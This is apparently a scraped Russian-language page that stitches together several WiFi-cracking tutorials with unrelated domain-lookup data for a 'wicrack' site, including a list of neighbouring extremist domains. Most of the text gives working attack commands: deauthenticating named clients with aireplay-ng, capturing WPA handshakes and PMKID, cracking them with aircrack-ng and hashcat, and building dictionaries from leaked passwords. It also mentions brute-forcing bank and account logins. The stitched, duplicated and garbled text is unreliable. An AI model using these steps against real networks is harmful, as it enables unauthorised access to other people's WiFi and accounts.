Содержание
- 1 Какая техника взлома WiFi самая быстрая?
- 2 Web Server Information
- 3 Websites Hosted on Same IP (i.e. 45.88.202.111)
- 4 HTTP Header Analysis
- 5 Domain Nameserver Information
- 6 DNS Record Analysis
- 7 Similarly Ranked Websites
- 8 Websites Hosted on Same IP (i.e. 45.88.202.111)
- 9 На чем брутить пароли WiFi?
- 10 Готовимся к атаке
- 11 3. Kismet
- 12 Smartkey WiFi Password Recovery
- 13 Программа для взлома WiFi — слушаем эфир WIFI
- 14 Взлом WiFi пароля при помощи программ
- 15 Термины Wi-Fi сетей
- 16 List of Commands
- 17 Захват PMKID в Airodump-ng
- 18 Захват рукопожатий
Какая техника взлома WiFi самая быстрая?
Раньше я бы ответил: WPS. Если на точке доступа включен Wi-Fi Protected Setup, то с большой вероятностью она вскрывается перебором известных пинов или более изящной атакой PixieDust. Список пинов для перебора берется из дефолтных конфигов производителя, который определяется по MAC-адресу. Делать исчерпывающий перебор всех вариантов (брутфорс) чаще всего бессмысленно, так как после N неудачных попыток авторизации по WPS роутер надолго блокирует дальнейшие.
Успешный подбор WPS PIN с помощью WiFi-Autopwner
В любом случае атака на WPS занимала до пяти минут и казалась скоростной по сравнению с ожиданием захвата хендшейка WPA, который потом еще надо мучительно долго брутить. Однако сейчас появился новый тип атаки — PMKID (Pairwise Master Key Identifier). На уязвимых роутерах она позволяет захватить хендшейк за считаные секунды, и даже при отсутствии подключенных к нему клиентов! С ней не надо никого ждать и деаутентифицировать, достаточно одной (даже безуспешной) попытки авторизации с вашей стороны.
Поэтому оптимальный алгоритм взлома (аудита) следующий: определяем, включен ли на целевой точке доступа режим WPS. Если да, запускаем PixieDust. Безуспешно? Тогда перебор известных пинов. Не получилось? Проверяем, не включено ли шифрование WEP, которое тоже обходится влет. Если нет, то выполняем атаку PMKID на WPA(2). Если уж и так не получилось, тогда вспоминаем классику и ждем хендшейка (чтобы не палиться) или активно кикаем клиентов, чтобы наловить их сессии авторизации.
Я узнал WPS PIN, что дальше?
Дальше с его помощью можно подключиться к роутеру и узнать пароль, каким бы длинным и сложным он ни был. Вообще WPS — это огромная дыра в безопасности. На своем оборудовании я всегда его отключаю, а потом еще проверяю WiFi-сканером, действительно ли WPS выключен.
Я перехватил хендшейк. Что с ним делать?
Четырехстороннее рукопожатие записывается скриптом Wifite2 в файл с расширением .cap.
Захват классического хендшейка WPA
TCPdump, Wireshark, Nmap и другие программы используют формат .pcap. Хендшейк PMKID будет иметь формат .16800.
По умолчанию Wifite использует для подбора паролей Aircrack-ng. Он отправляет команду вида
1 | aircrack-ng yourhandshake.cap-wyourwordlist.txt |
В простейших вариантах этого достаточно, однако чаще приходится конвертировать хендшейки с помощью hcxtools, чтобы скормить одной из продвинутых утилит для перебора паролей. Например, John the Ripper или hashcat.
Мне больше нравится hashcat. Для работы с ней нужно конвертировать .cap в формат .hccapx. Сделать это можно также онлайн или локально утилитой cap2hccapx. В последнем случае придется скачать исходник и скомпилировать его.
1 |
wget https//raw.githubusercontent.com/hashcat/hashcat-utils/master/src/cap2hccapx.c gcc-ocap2hccapx-converter cap2hccapx.c |
Полученный исполняемый файл cap2hccapx-converter удобнее закинуть в /bin, чтобы затем обращаться к нему откуда угодно.
1 | <span class=»pln»>mv cap2hccapx<span><span class=»pun»>-<span><span class=»pln»>converter<span><span class=»pun»><span><span class=»pln»>bin<span> |
Успешный взлом пароля WiFi в hashcat по хендшейку WPA2
Точно так же брутятся хеши PMKID. Просто нужно явно указать hashcat тип хендшейка и словарь.
1 |
hashcat64-m2500-w3 Beeline.hccapx»wordlist\wpadict.txt»# Перебираем пароли по своему словарю wpadict.txt к хешу из рукопожатия WPA(2) в файле Beeline.hccapx hashcat64-m16800-w3RT-WiFi.16800″wordlist\rockyou.txt»# Используем хендшейк PMKID из файла RT-WiFi.16800 и готовый словарь rockyou.txt |
Брут PMKID в hashcat
Web Server Information
Hosted IP Address:
45.88.202.111
Hosted Country:
CH
Location Latitude:
47.1449
Location Longitude:
8.1551
Программа для взлома Wi Fi — WiCrack, взлом Wi Fi программой WiCrack
wicrack, взлом wi fi, как взломать wi fi, как взломать вай фай, программа для взлома wi fi
Websites Hosted on Same IP (i.e. 45.88.202.111)
Washington Summit Publishers
— washsummit.com
WASHINGTON SUMMIT PUBLISHERS and RADIX are independent bookmakers, dedicated to exploring culture, society, human biodiversity, and critical theory. Learn more
Not Applicable
$ 8.95
— whitenationalism.com
Not Applicable
$ 8.95
— radixjournal.com
7,601,280
$ 240.00
Favoured Toolbase
— toolbase.me
Die besten Hacking Tools zum kostenlosen Download und Tutorials für Anfänger und Fortgeschrittene. Die beste Toolbase für Hacker mit einer großen Auswahl an geprüften Downloads. Erste Anlaufstelle für deutschsprachige Hacker.
8,774,258
$ 240.00
Black Lives Splatter
— badgoy.net
Not Applicable
$ 8.95
HTTP Header Analysis
HTTP/1.1 200 OKServer: nginxContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=60Vary: Accept-EncodingDate: Wed, 11 Dec 2019 22:49:35 GMTX-Page-Speed: 1.13.35.2-0Cache-Control: max-age=0, no-cacheContent-Encoding: gzip
Domain Nameserver Information
Host | IP Address | Country | |
---|---|---|---|
st1.freednscontroller.com | 185.238.1.8 | Netherlands | |
st1.publicdnscontroller.com | 185.238.1.8 | Netherlands |
DNS Record Analysis
Host | Type | TTL | Extra |
---|---|---|---|
wicrack.com | A | 14400 |
IP: 45.88.202.111 |
wicrack.com | NS | 14400 |
Target: st1.freednscontroller.com |
wicrack.com | NS | 14400 |
Target: st1.publicdnscontroller.com |
wicrack.com | SOA | 180 |
MNAME: st1.freednscontroller.comRNAME: root.wicrack.comSerial: 2019080904Refresh: 7200 |
wicrack.com | MX | 14400 |
Priority: 10Target: mail.wicrack.com |
wicrack.com | TXT | 14400 |
TXT: v=spf1 a mx ip4:185.238.1.8 ~all |
Similarly Ranked Websites
— boulderacousticsociety.net
9,878,768
$ 240.00
— alexamodels.com
9,878,777
$ 240.00
— shirte.net
9,878,777
$ 8.95
— domdom.hu
Domain regisztráció és hoszting. Honlapkészítés. Egyszerűen, gyorsan, olcsón!
9,878,780
$ 240.00
Цветочная кухня Lflora – студия флористики и декора в Киеве
— lflora.com
Студия флористики и декора в Киеве
9,878,790
$ 240.00
Websites Hosted on Same IP (i.e. 45.88.202.111)
Washington Summit Publishers
— washsummit.com
WASHINGTON SUMMIT PUBLISHERS and RADIX are independent bookmakers, dedicated to exploring culture, society, human biodiversity, and critical theory. Learn more
Not Applicable
$ 8.95
— whitenationalism.com
Not Applicable
$ 8.95
— radixjournal.com
7,601,280
$ 240.00
Favoured Toolbase
— toolbase.me
Die besten Hacking Tools zum kostenlosen Download und Tutorials für Anfänger und Fortgeschrittene. Die beste Toolbase für Hacker mit einer großen Auswahl an geprüften Downloads. Erste Anlaufstelle für deutschsprachige Hacker.
8,774,258
$ 240.00
На чем брутить пароли WiFi?
Локально перебирать пароли лучше на десктопном компе с мощной видюхой, а если его нет, воспользуйся онлайновыми сервисами. Бесплатно в них предлагаются ограниченные наборы, но даже их порой достаточно.
Взлом двух паролей WiFi онлайн
Еще один интересный вариант — использовать сеть распределенных вычислений. Сделать это позволяет, например, Elcomsoft Distributed Password Recovery. Эта универсальная программа понимает десятки форматов паролей и хешей, включая .cap, .pcap и .hccapx. Над одной задачей в ней одновременно могут работать до десяти тысяч компьютеров, объединяя ресурсы своих процессоров и видеокарт.
Распределенный брут хешей WPA
Плюс у нее очень продвинутый подход к словарной атаке. Можно использовать маски, приставки и мутации, фактически расширяя объем словаря в несколько раз.
Почему выполняют атаку по словарю вместо брута?
Ключ WPA(2)-PSK генерируется длиной 256 бит. Число возможных комбинаций (2^256) таково, что даже на мощном сервере с графическими ускорителями потребуются годы для их перебора. Поэтому реалистичнее выполнить словарную атаку.
Обычно Wifite2 делает это сам. После захвата хендшейка он проверяет его качество. Если все нужные данные в нем сохранились, то автоматически запускается атака по словарю wordlist-top4800-probable.txt. Как нетрудно догадаться, в нем всего 4800 самых распространенных паролей.
Он удобен тем, что быстро срабатывает даже на стареньком ноутбуке, однако с большой вероятностью искомой комбинации в этом словаре не будет. Поэтому стоит сделать свой.
Как составить свой словарь?
Сначала я собрал коллекцию словарей из разных источников. Это были предустановленные словари в программах для перебора паролей, каталог /usr/share/worldlists/ в самой Kali Linux, базы утекших в Сеть реальных паролей от разных аккаунтов и подборки на профильных форумах. Я привел их к единому формату (кодировке), используя утилиту recode. Дальше переименовал словари по шаблону dict##, где ## — счетчик из двух цифр. Получилось 80 словарей.
Объединение 80 словарей, пропуская одинаковые записи
На следующем этапе я объединил их в один, удалив явные повторы, после чего запустил утилиту PW-Inspector для очистки объединенного словаря от мусора. Поскольку пароль для WiFi может быть от 8 до 63 символов, я удалил все записи короче 8 и длиннее 63 знаков.
1 |
cat *>alldicts|sort|uniq pw-inspector-ialldicts-m8-M63>WPAMegaDict |
Затем я подумал, что получился слишком большой файл, который можно сократить сильнее без явного ущерба для эффективности перебора. Вы видели в реальной жизни пароли Wi-Fi длиннее 16 символов? Вот и я не видел.
1 | pw-inspector-iWPAMegaDict-m8-M16>WPADict_8-16 |
На файлообменнике Кима Доткома можно (647 Мб в ZIP-архиве, 2,8 Гб в распакованном виде).
Готовимся к атаке
Существует множество типовых атак на точки доступа Wi-Fi и специфических эксплоитов для определенных моделей с конкретными версиями прошивок. К типовым относятся методы подбора WPS PIN, вычисление ключей WEP и WPA2 по анализу перехваченных пакетов, а также принудительное переключение AP на более слабый алгоритм шифрования (WEP вместо WPA).
Особняком стоят методы социального инжиниринга: создание поддельных AP (идентичных атакуемой) для получения пароля от настоящей или же для проведения различных MitM-атак, а также деавторизация/глушение беспроводных клиентов и DoS как самостоятельные цели.
Самый универсальный способ атаки на точку доступа — вычисление ее ключа WPA2 по отдельным сообщениям (M1-M4) из перехваченных хендшейков. Он срабатывает практически всегда, но требует больших затрат (особенно времени). Перехват «рукопожатий» всегда выполняется в режиме мониторинга, который поддерживает далеко не каждый Wi-Fi-чип и драйвер. Для ускорения сбора хендшейков потребуется функция инжекта пакетов, которая деавторизует подключенных к AP клиентов и заставляет их чаще отправлять «рукопожатия». Она и вовсе встречается у единичных Wi-Fi-модулей.
За редким исключением предустановленные в смартфон драйверы не позволяют даже запускать режим мониторинга, да и альтернативные драйверы для встроенных чипов есть не всегда. Поэтому для взлома чаще используют внешние USB Wi-Fi адаптеры с hacker friendly чипами (преимущественно от Atheros и Ralink). Подробнее смотри в статье «Выбираем бюджетный адаптер для взлома Wi-Fi».
Однако есть и обходной путь, не требующий покупки оборудования или мучений с драйверами. У многих точек доступа с надежной защитой (вроде WPA2 PSK CCMP) порой оказывается разрешен WPS — дополнительный вариант авторизации по пин-коду. Этот пин часто остается дефолтным и легко вычисляется.
Теоретически у восьмизначного WPS-пина всего 100 миллионов комбинаций, из которых уникальны только 10 миллионов, так как последняя цифра — контрольная и зависит от других семи. На практике же достаточно перебрать только 11 тысяч вариантов из-за уязвимостей самого алгоритма (концептуально подобных найденным в LM-хеше, подробнее здесь).
Брутфорс 11 тысяч PIN-кодов при хорошем уровне сигнала займет примерно полдня, поскольку на проверку одного пина тратится от двух до десяти секунд. Поэтому на практике используются только самые быстрые атаки на WPS — по дефолтным значениям пинов и по их сниженной энтропии (pixie dust). Для противодействия брутфорсу пин-кодов и подключению к фейковой точке доступа между AP и клиентскими устройствами предусмотрен обмен хешами. По задумке они должны вычисляться на основе WPS PIN и двух случайных чисел. На практике многие роутеры либо генерируют предсказуемые числа, либо вовсе оставляют их нулевыми. Энтропия резко снижается, а механизм, задуманный для усиления защиты, из-за некорректной реализации лишь ослабляет ее. Также некоторые производители задают WPS-пин как производное от других известных значений (в частности, MAC-адреса). Такие точки доступа вскрываются практически мгновенно.
Актуальность WPS-атак состоит еще и в том, что в некоторых точках доступа функция Wi-Fi Protected Setup включена по умолчанию и не отключается штатными средствами. Из-за кривой прошивки девайса либо в его меню настроек нет соответствующего пункта, либо положение переключателя Enable/Disable в нем не играет роли. Видимо, это одна из причин того, почему в любом городе среди множества «защищенных» беспроводных сетей до сих пор хватает легких целей.
3. Kismet
Kismet is a network detector, packet sniffer and intrusion detection software for 802.11 wireless LANs that supports raw monitoring mode and sniff 802.11a, 802.11b, 802.11g and 802.11n traffic.
Kismet sniffs and captures packets of wireless network in order to determine username and password. You can also use Kismet to identify hidden network and sniff into other connected systems as Kismet features the ability to detect default or non-configured networks and determine what level of wireless decryption needs to be done on a given access point.
Kismet comes with three separate parts, drone to collect the packets of any wireless network, server in connection with drone to interpret packet data and extrapolating wireless information and the client that communicates with server and displays all the information collected by server.
Smartkey WiFi Password Recovery
This is actually a Wifi password recovery app but you can use WiFi Password recovery as a hacking software to hack WiFi password of a WiFi connection. It is a very powerful WiFi password hacking tool for Windows. The software claims to crack any type of high security WiFi password.
The software provides 5 different attack methods to crack password of a WiFi. The attaks are: dictionary attack, word attack, mask attack, combination attack and hybrid attack to crack the WiFi password.
The dictionary attack tries every word from the dictionary to crack the password. Word attack tries all the anagrams and mutations of a word. Mask attack is used when you have some knowledge of the WiFi password. For example, the length of password, starting letter, ending letter, number of vowels, etc.
Combination attack uses all possible mutations of two words and the hybrid attack tries all the mutations of the dictionary. You can even provide more than one dictionary to crack the WiFi password.
Программа для взлома WiFi — слушаем эфир WIFI
И так, что мы имеем? Наш мощный Wi-Fi адаптер настроен на максимальную мощность в режиме monitor mode и ожидает приказаний на интерфейсе mon0. Программа для взлома WiFi готова и ждет нашей отмашки на атаку. Самое время осмотреться и прослушать эфир. Командуем:
root@bt:~# airodump-ng mon0
1 | root@bt~# airodump-ng mon0 |
Теперь смотрим на экран!
Красным выделена сеть с WEP шифрованием — большая редкость по нынешним временам (в моем районе не нашлось и создал сам)))
Ну и что же нам показывает программа для взлома WiFi? В левом верхнем углу видно как сканируются каналы (если необходимо зафиксировать канал, нужно вызывать airodump-ng с ключом —channel ). Потом идет таблица найденных сетей с указанием (слева направо): BSSID (MAC-адрес сети), уровень приема сигнала в dBm (зависит от чувствительности приемника, на хороших адаптерах -80 dBm это вполне нормальный уровень), количество принятых Beacon frames (это широковещательные пакеты, несущие информацию о сети), число принятых пакетов данных и скорость приема (пакетов в секунду), канал на котором вещает точка доступа, скорость точки доступа в мегабитах, тип аутентификации (OPN — открытая сеть, WEP, WPA, WPA2), тип шифрования, волшебные буковки PSK в случае с WPA/WPA2 (подробности описаны выше в гл.2) и, наконец, название сети, то есть её ESSID.
Чуть ниже основной таблицы приведена таблица текущих ассоциаций клиентов к точкам. Забегая вперед отмечу, что она тоже важна, так как по ней можно определить активность и MAC-адреса клиентов для последующей их деассоциации.
Из картинки выше следует что нам есть чего ловить — программа для взлома WiFi нашла точки доступа, и клиентов с хорошим сигналом. Осталось выбрать нашу цель (чтобы файл сильно не разбухал можно записывать пакеты только от одной точки доступа дав ключ —bssid или ограничив каналы как указано чуть выше) и дать команду записывать пакеты в файл добавив к вызову ключ -w
Важно: если вы загрузились с DVD запись файла с пакетами необходимо вести на внешнюю флешку или жесткий диск, предварительно примонтировав их командой mount:
root@bt:~# mkdir /mnt
root@bt:~# mount /dev/sda1 /mnt
root@bt:~# cd /mnt
1 |
root@bt~# mkdir /mnt root@bt~# mount /dev/sda1 /mnt root@bt~# cd /mnt |
где /dev/sda1 — файл устройства внешней флешки (найти куда подцепилась флешка в вашем случае можно покопавшись в результатах вывода команды dmesg).
Для примера запустим airodump-ng на запись пакетов только одной сети из списка в файл testcap.cap:
root@bt:~# airodump-ng —bssid a0:21:b7:a0:71:3c -w testcap mon0
1 | root@bt~# airodump-ng —bssid a0:21:b7:a0:71:3c -w testcap mon0 |
Теперь можно заняться своими делами ожидая пока очередной клиент не пожелает прицепиться к точке доступа и подарить нам вожделенный хендшейк. Кстати, после получения хендшейка в правом верхнем углу появится предупреждающая надпись: WPA handshake: A0:21:B7:A0:71:3C. Все, дело сделано, и можно переходить к следующей главе.
Когда все дела переделаны а хендшейка нет и нет, в голову приходит светлая мысль что неплохо бы поторопить клиента с хендшейком. Для этого наша программа для взлома WiFi — aircrack-ng содержит специальную утилиту, позволяющую отправлять клиентам запросы на деассоциацию (отсоединение) от точки доступа, после чего клиент снова захочет соединиться, а именно этого мы и ждем. Утилита эта называется aireplay-ng и запускать ее нужно в отдельном окне параллельно с запуском airodump-ng чтобы можно было одновременно записать результаты работы. Запускаем деассоциацию:
root@bt:~# aireplay-ng —deauth 5 -a a0:21:b7:a0:71:3c -c 00:24:2b:6d:3f:d5 wlan1
1 | root@bt~# aireplay-ng —deauth 5 -a a0:21:b7:a0:71:3c -c 00:24:2b:6d:3f:d5 wlan1 |
где очевидно, что мы проводим 5 сеансов деассоциации клиента 00:24:2b:6d:3f:d5 от точки доступа с BSSID a0:21:b7:a0:71:3c (адрес клиента мы взяли из нижней таблицы ассоциаций airodump-ng, его можно вообще не указывать, тогда деассоциация будет проводиться широковещательным запросом что не так эффективно как хотелось бы).
После проведения подобной процедуры (а ничто не мешает нам повторить ее еще разок на всякий случай) вероятность словить хендшейк значительно возрастает.
Взлом WiFi пароля при помощи программ
В данном сегменте программ для взлома много, но мы поговорим о наиболее популярных.
Взломщик Aircrack-ng
Хорошие отзывы от пользователей имеет утилита Aircrack-ng. Это большой набор инструментов, в который входит: airodump, aireplay, aircrack, airdecap.
- Скачиваем и распаковываем. Заходим в папку «Bin» запускаем файл Aircrack-ng GUI.
- Во вкладке «Filenames» нужно выбрать дамп который будет перехватывать пакеты и ключи. К примеру, можно взять утилиту CommView for WiFi для этих целей.
- Назначаем тип шифрования, которым вайфай сеть защищена: либо WEP, либо WPA Для варианта WEP необходимо назначить длину ключа и сделать отмену в пункте «USE PTW attack». Для варианта WPA достаточно только определится со словарем для подбора пароля.
- Последнее действие, которое нужно сделать, это нажать на кнопку «Launch». Весь процесс перебора занимает 2-5 минут.
Метод Brute force
Суть брутфорса заключается в полном автоматизированном подборе всех возможных вариантов пароля. Этот метод подходит для продвинутых пользователей, обычному юзеру будет крайне сложно. Такие хакерские методы часто используют для взлома платежных систем, онлайн-банков, учетных записей.
Если вы решились попробовать Brute force, имейте виду, характеристики ПК играют большую роль, если компьютер слабый, программа может делать анализ несколько дней.
На текущий момент существует несколько вариантов «полного перебора»:
- Персональный взлом. Это когда взламывают почту, аккаунт, сайт.
- Брут-чек. Здесь ведется охота по-крупному, 1-2 пароля некому ненужные, интересует большое количество паролей от каких нибудь крупных ресурсов.
- Взлом компьютерного устройства произведенного удаленно.
С Brute force хорошо сочетаются приложения: Brutus AET, All-in-One Checker, Appnimi Password Unlocker.
Взломщики для Windows — AirSlax, Wi-FI Sidejacking, CommView for WiFi, Dumpper
- AirSlax – утилита, которая ловит пакеты в сети вай фай, в дальнейшем они необходимы для подбора пароля. Подбирает password с шифрованием WPA, WPA2, WEP, а также пин-код по WPS.
- Wi-FI Sidejacking — этот взломщик полностью бесплатный, мало настроек, утилита представлена на русском языке, поддерживаем мобильные устройства.
- CommView for WiFi – подходит для любой ОС Windows, утилита делает захват и анализ сетевых пакетов. Русский язык присутствует.
- Dumpper – эта утилита на маршрутизаторе взламываем ее PIN код. Запускаем сканер. Через минуту вы будете знать обо всех компьютерах на расстоянии пару метров. Этот PIN необходим будет для некоторых утилит, которые помогут взломать вам пароль WiFi.
Термины Wi-Fi сетей
Точка Доступа (также Access Point), сокращённо ТД, AP – устройство, которое обеспечивает работу сети Wi-Fi, к нему подключаются Клиенты. Чаще всего точками доступа являются роутеры.
Клиент (Станция) – устройство, которое подключается к Точке Доступа. Чаще всего это компьютеры, ноутбуки, сотовые телефоны и т.д.
ESSID и SSID – это имена беспроводных Wi-Fi сетей – именно их вы видите, когда выбираете к какой сети подключиться. Строго говоря, ESSID и SSID это не одно и то же, но в аудите Wi-Fi эти термины часто используются как взаимозаменяемые. На скриншоте ниже ESSID (именами сетей) являются MiAl, wifi88 и т.д.:
BSSID – это MAC-адрес беспроводной карты. Пример MAC-адреса: 50:46:5D:6E:8C:20. Более подробно о них рассказано в заметке «Как узнать MAC-адрес и Как по MAC-адресу узнать производителя».
Рукопожатие (также хэндшейк, handshake) – данные, которыми обмениваются Станция и Точка Доступа в момент создания Wi-Fi соединения. Эти данные содержат информацию, позволяющую подобрать пароль от сети Wi-Fi.
Брут-форс (также полный перебор) – метод атаки на пароль, заключающийся в переборе всех возможных вариантов пароля. Требует много времени и вычислительных ресурсов.
Перебор по словарю (атака по словарю) – метод атаки на пароль, заключающийся в переборе часто встречающихся вариантов пароля. Имеет хорошее соотношение затраченных ресурсов к полученным результатам.
Онлайн перебор пароля Wi-Fi – метод подбора пароля, который заключается в подключении к Точке Доступа с различными кандидатами в пароли. Практически не применяется из-за крайне низкой скорости перебора.
Офлайн перебор пароля Wi-Fi – метод подбора пароля, который заключается в захвате Рукопожатия и подборе такого пароля, который бы соответствовал этому рукопожатию. Этот подбор не требует подключения к Точке Доступа и выполняется на много порядков быстрее, чем онлайн перебор. Также он может выполняться на вычислительных мощностях видеокарт, что увеличивает скорость перебора ещё на несколько порядков.
WPA и WPA2 – технология защищённого доступа к Wi-Fi, пришла на смену устаревшей технологии WEP.
Беспроводная Wi-Fi карта (или беспроводной Wi-Fi адаптер) – любая сетевая карта, способная подключаться к сети Wi-Fi. В ноутбуках и телефонах они встроены внутрь корпуса, в настольных компьютерах обычно представляют собой внешнее устройство, подключаемое по USB.
Режим монитора (Monitor Mode) – свойство некоторых беспроводных адаптеров принимать пакеты данных, которые предназначены не только для них, но и для других беспроводных устройств.
Сетевой интерфейс – имя, условное обозначение в Linux сетевых карт/адаптеров.
Канал сети Wi-Fi – условное цифровое обозначение частоты, на которой в данный момент работает Точка Доступа.
List of Commands
Below is a list of all of the commands needed to crack a WPA/WPA2 network, in order, with minimal explanation.
# put your network device into monitor mode airmon-ng start wlan0 # listen for all nearby beacon frames to get target BSSID and channel airodump-ng mon0 # start listening for the handshake airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0 # optionally deauth a connected client to force a handshake aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 ########## crack password with aircrack-ng... ########## # download 134MB rockyou.txt dictionary file if needed curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # crack w/ aircrack-ng aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap ########## or crack password with naive-hashcat ########## # convert cap to hccapx cap2hccapx.bin capture/-01.cap capture/-01.hccapx # crack with naive-hashcat HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
Захват PMKID в Airodump-ng
Теперь попробуем захватить PMKID с помощью Airodump-ng. Напомню, что PMKID содержится в первом сообщении рукопожатия, это сообщение Точка Доступа отправляет в ответ на ассоциацию с ней.
Нам нужно узнать, на каком канале работает целевая ТД, а также её BSSID (MAC-адрес). Для обзора эфира мы запускаем airodump-ng:
sudo airodump-ng wlp0s20f0u1
Меня интересует беспроводная сеть Paangoon_2G, она работает на канале 9 и её MAC-адрес 40:3D:EC:C2:72:B8.
Вновь запускаем airodump-ng, с опцией —channel указываем желаемый канал, а с опцией -w указываем файл для записи захваченных радио фреймов:
sudo airodump-ng wlp0s20f0u1 --channel 9 -w cap2
Теперь нужно ассоциироваться с точкой доступа. Для этого я пробовал использовать aireplay-ng, но эта программа поддерживает ассоциацию только для WEP и не работает с WPA (ошибка Denied (code 12), wrong ESSID or WPA).
Ассоциация происходит естественным образом при попытке подключиться к этой точки доступа, то есть с другой беспроводной карты можно начать подключение к точке доступа и в этом случае действительно удаётся захватить PMKID, правда вместе с рукопожатием. Об этом говорит строка «WPA (1 handshake, with PMKID)».
Можно подключиться, например, через Network Manager или с помощью другого компьютера или телефона, пароль можно указать любой. Для подключения из командной строки, создайте конфигурационный файл (замените данные на свои):
wpa_passphrase "Paangoon_2G" 22222222 > Paangoon_2G.conf
Здесь:
- «Paangoon_2G» — имя интересующей меня сети
- 22222222 — произвольный пароль (не менее 8 символов)
- Paangoon_2G.conf — имя конфигурационного файла.
Для подключения выполните:
sudo wpa_supplicant -i wlo1 -c Paangoon_2G.conf -d
Здесь:
- -i wlo1 — имя беспроводного интерфейса, используемого для подключения
- -c Paangoon_2G.conf — используемый для подключения конфигурационный файл
- -d — опция, включающая показ сообщений отладки
Анализ полученного файла:
aircrack-ng cap2-01.cap
Для извлечения PMKID (чтобы для брутфорса не использовался хендшейк с заведомо неверным паролем), откроем этот файл в Wireshark:
wireshark-gtk cap2-01.cap
Для отделения только нужных данных, используем следующий фильтр (замените 40:3D:EC:C2:72:B8 на интересующую вас точку доступа):
(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || (eapol && wlan.rsn.ie.pmkid)) && wlan.addr==40:3D:EC:C2:72:B8
Загляните в первое сообщение рукопожатия и убедитесь, что там действительно присутствует PMKID:
Теперь с помощью CTRL+m выделите нужные пакеты (Beacon и Message 1):
И в меню File выберите Export Specified Packets. Введите имя файла и поставьте переключатель на Marked packets only. Если вам непонятно, как сохранять отдельные фреймы, то смотрите статью «Как извлечь рукопожатия из файла захвата с несколькими рукопожатиями», там имеются дополнительные скриншоты.
Я сохранил эти два фрейма в файл extracted.pcap, проверяю файл:
aircrack-ng extracted.pcap
Отлично: хендшейков — 0, зато есть PMKID, об этом говорит уже знакомая нам строка «WPA (0 handshake, with PMKID)».
Можно вновь запустить тестовый взлом:
aircrack-ng -w test.dic extracted.pcap
Вновь пароль успешно взломан:
Захват рукопожатий
airodump-ng – инструмент для захвата беспроводных пакетов. Очень часто применяется для захвата четырёхэтапных рукопожатий, используемых в дальнейшем для взлома пароля Wi-Fi сети. Может захватывать любые фреймы беспроводных сетей для последующего анализа.
boopsniff – программа из пакета BoopSuite для показа точек доступа в диапазоне доступности и захвата рукопожатий.
Airbase-ng – это многоцелевой инструмент, предназначенный для атаки клиентов, а не точки доступа. Может применяться для захвата половинчатых рукопожатий, алгоритм атаки при этом следующий: Airbase-ng смотрит, какие точки доступа ищут клиенты (например, сотовый телефон, в котором включен Wi-Fi) и создаёт точку доступа с этим именем; клиент пытается подключиться к этой ненастоящей точке доступа, в результате захватывается половина рукопожатия, которое пригодно для взлома пароля от истинной Wi-Fi сети.
WPA2-HalfHandshake-Crack – это рабочий концепт для демонстрации возможности того, что для взлома WPA2 сети достаточно захватить рукопожатие (handshake) от пользователя, пытающегося подключиться к фальшивой ТД. Т.е. захватывает половинчатое рукопожатие.
zizzania автоматизирует захват рукопожатий для всех точек доступа в пределах досягаемости.